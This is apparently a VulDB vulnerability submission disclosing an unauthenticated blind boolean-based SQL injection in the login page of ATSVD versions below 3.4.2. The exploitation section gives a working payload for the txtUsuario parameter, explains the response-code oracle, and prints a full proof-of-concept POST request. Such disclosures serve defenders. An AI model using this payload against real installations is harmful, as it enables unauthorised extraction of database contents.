Submit #504099: AT Software Solutions ATSVD < 3.4.2 Blind Boolean-Based SQL Injectioninfo

Title	AT Software Solutions ATSVD < 3.4.2 Blind Boolean-Based SQL Injection
Description	Blind Boolean-Based SQL Injection in ATSVD < 3.4.2 Vendor: AT Software Solutions // https://atgroup.com.br Affected Product: ATSVD Affected Versions: < 3.4.2 Vulnerability Type: Blind Boolean-Based SQL Injection CVSS Score: 7.5 Summary: A Blind Boolean-Based SQL Injection vulnerability has been identified in the ATSVD system by AT Software Solutions, affecting versions < 3.4.2. The vulnerability exists in the txtUsuario parameter of the following endpoint: /login.aspx An attacker can exploit this vulnerability to infer database information using Boolean-based SQL Injection techniques. Exploitation: The vulnerability can be exploited using the following payload: ','',''),'','')+AND+(CASE+WHEN+(SUBSTRING(DB_NAME(),X,1)='Y')+THEN+1/0+ELSE+0+END=1)-- If the query is correct, the response code is 500. If not, the response code is 200. This allows an attacker to extract database information one character at a time, its just needed to change the argument X to the database name index and Y to the character. POC POST /login.aspx HTTP/1.1 Host: X.X.X.X Content-Length: 703 Cache-Control: max-age=0 Accept-Language: pt-BR,pt;q=0.9 Origin: X.X.X.X Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: X.X.X.X Accept-Encoding: gzip, deflate, br Connection: keep-alive __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=CwXEZS6e9WikUP9ry0D0Ai6IXyc5FQy%2Bp70gKogn1yXPv1C%2B0DJ7G6nki8BxXdec%2FfrzwtM47AGtO5FhZy4irSHWszG%2BJTmAifb%2FRTct%2BzIqGD42q3uBocgMqwDqTD2ExM32JTXxH3UBjABslyoLT1tR8hie%2BLIvjH4zNC1wdXSXU%2BY%2FIjXC%2BQPTaFMKND%2Bz%2FXVYTNs7%2FjlBqHdI%2FFYtLw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=Pu6msOCh%2FFHVq9R1ekhLKxkng9hxVOuBWnW6Eaqq4C20cfN2TwKXHiC9XA%2F%2BJ19DObWFq0gerKIls54eAPAD0484o1WL4l%2BxryAM5ZtcgpH34ckmR4ZOgj0h0Eozznntd61o87ogODWBPLS13AJK7yWk8oxj5Nip3kbSq5eyPdsW97ld7n666XUGHwyNwUuvT6%2FWKpXMrhqXGcqHmmLq9Q%3D%3D&txtUsuario=','',''),'','')+AND+(CASE+WHEN+(SUBSTRING(DB_NAME(),1,1)='a')+THEN+1/0+ELSE+0+END=1)--&txtSenha=a&cmdLogin=Login&txtCPF= Impact: No authentication or privileges are required. The attack can be performed remotely. The attacker can infer database schema details, potentially leading to further exploitation. By Yago Martins
Source	⚠️ https://github.com/yago3008/cves
User	y4g0 (UID 80480)
Submission	02/20/2025 01:12 AM (4 months ago)
Moderation	03/01/2025 08:53 AM (9 days later)
Status	Accepted
VulDB Entry	298069 [AT Software Solutions ATSVD up to 3.4.1 Login Endpoint /login.aspx txtUsuario sql injection]
Points	20

◂ Previous Overview Next ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!